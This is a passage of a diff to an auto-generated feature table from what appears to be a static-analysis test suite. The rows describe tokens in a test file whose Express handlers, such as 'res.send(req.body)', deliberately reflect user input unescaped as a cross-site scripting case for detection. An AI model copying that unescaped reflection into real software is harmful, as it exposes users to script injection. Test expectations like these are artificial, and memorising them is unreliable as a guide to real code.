marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:3:34:10 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:3:34:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:3:34:10 | res.send | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:3:34:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:3:34:10 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:3:34:19 | exceptional return of res.send(mytable) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:3:34:19 | exceptional return of res.send(mytable) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:3:34:19 | exceptional return of res.send(mytable) | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:3:34:19 | exceptional return of res.send(mytable) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:3:34:19 | exceptional return of res.send(mytable) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:3:34:19 | res.send(mytable) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:3:34:19 | res.send(mytable) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:3:34:19 | res.send(mytable) | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:3:34:19 | res.send(mytable) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:3:34:19 | res.send(mytable) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:7:34:10 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:7:34:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:7:34:10 | send | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:7:34:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:7:34:10 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:12:34:18 | mytable | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:12:34:18 | mytable | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:12:34:18 | mytable | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -19698,12 +132640,70 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:12:34:18 | mytable | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:12:34:18 | mytable | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:12:34:18 | mytable | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:5:37:12 | showdown | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:5:37:12 | showdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:5:37:12 | showdown | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:5:37:35 | showdow ... wdown') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:5:37:35 | showdow ... wdown') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:5:37:35 | showdow ... wdown') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:5:37:35 | showdown | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:5:37:35 | showdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:5:37:35 | showdown | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:17:37:23 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:17:37:23 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:17:37:23 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:17:37:35 | exceptional return of require('showdown') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:17:37:35 | exceptional return of require('showdown') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:17:37:35 | exceptional return of require('showdown') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:17:37:35 | require('showdown') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:17:37:35 | require('showdown') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:17:37:35 | require('showdown') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:25:37:34 | 'showdown' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:25:37:34 | 'showdown' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:25:37:34 | 'showdown' | calleeImports | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:25:37:34 | 'showdown' | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:25:37:34 | 'showdown' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:37:25:37:34 | 'showdown' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:5:38:13 | converter | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:5:38:13 | converter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:5:38:13 | converter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:5:38:13 | converter | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:5:38:40 | convert ... erter() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:5:38:40 | convert ... erter() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:5:38:40 | convert ... erter() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:5:38:40 | converter | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:5:38:40 | converter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:5:38:40 | converter | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:17:38:40 | exceptional return of new sho ... erter() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:17:38:40 | exceptional return of new sho ... erter() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:17:38:40 | exceptional return of new sho ... erter() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:17:38:40 | new sho ... erter() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:17:38:40 | new sho ... erter() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:17:38:40 | new sho ... erter() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:21:38:28 | showdown | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:21:38:28 | showdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:21:38:28 | showdown | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:21:38:38 | showdown.Converter | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:21:38:38 | showdown.Converter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:21:38:38 | showdown.Converter | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:30:38:38 | Converter | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:30:38:38 | Converter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:38:30:38:38 | Converter | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:1:40:3 | app | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:1:40:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:1:40:3 | app | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:1:40:7 | app.get | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:1:40:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:1:40:7 | app.get | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:1:43:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:1:43:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:1:43:2 | app.get ... T OK\\n}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:1:43:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:1:43:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:1:43:2 | exceptional return of app.get ... T OK\\n}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:5:40:7 | get | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:5:40:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:5:40:7 | get | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:9:40:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:9:40:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:9:40:19 | '/user/:id' | calleeImports | express | @@ -19711,6 +132711,26 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:9:40:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:9:40:19 | '/user/:id' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:9:40:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:40:21 | converter | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:40:21 | converter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:40:21 | converter | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:40:21 | converter | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:40:21 | converter | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:40:21 | this | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:40:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:40:21 | this | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:40:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:40:21 | this | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:43:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:43:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:43:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:43:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:43:1 | 'arguments' object of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:43:1 | exceptional return of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:43:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:43:1 | exceptional return of anonymous function | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:43:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:43:1 | exceptional return of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:43:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:43:1 | functio ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:43:1 | functio ... OT OK\\n} | calleeImports | express | @@ -19718,6 +132738,61 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:43:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:43:1 | functio ... OT OK\\n} | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:43:1 | functio ... OT OK\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:43:1 | return of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:43:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:43:1 | return of anonymous function | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:43:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:22:43:1 | return of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:31:40:33 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:31:40:33 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:31:40:33 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:31:40:33 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:31:40:33 | req | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:31:40:33 | req | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:31:40:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:31:40:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:31:40:33 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:31:40:33 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:36:40:38 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:36:40:38 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:36:40:38 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:36:40:38 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:36:40:38 | res | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:36:40:38 | res | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:36:40:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:36:40:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:36:40:38 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:40:36:40:38 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:3:41:5 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:3:41:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:3:41:5 | res | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:3:41:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:3:41:5 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:3:41:10 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:3:41:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:3:41:10 | res.send | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:3:41:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:3:41:10 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:3:41:20 | exceptional return of res.send(req.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:3:41:20 | exceptional return of res.send(req.body) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:3:41:20 | exceptional return of res.send(req.body) | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:3:41:20 | exceptional return of res.send(req.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:3:41:20 | exceptional return of res.send(req.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:3:41:20 | res.send(req.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:3:41:20 | res.send(req.body) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:3:41:20 | res.send(req.body) | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:3:41:20 | res.send(req.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:3:41:20 | res.send(req.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:7:41:10 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:7:41:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:7:41:10 | send | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| 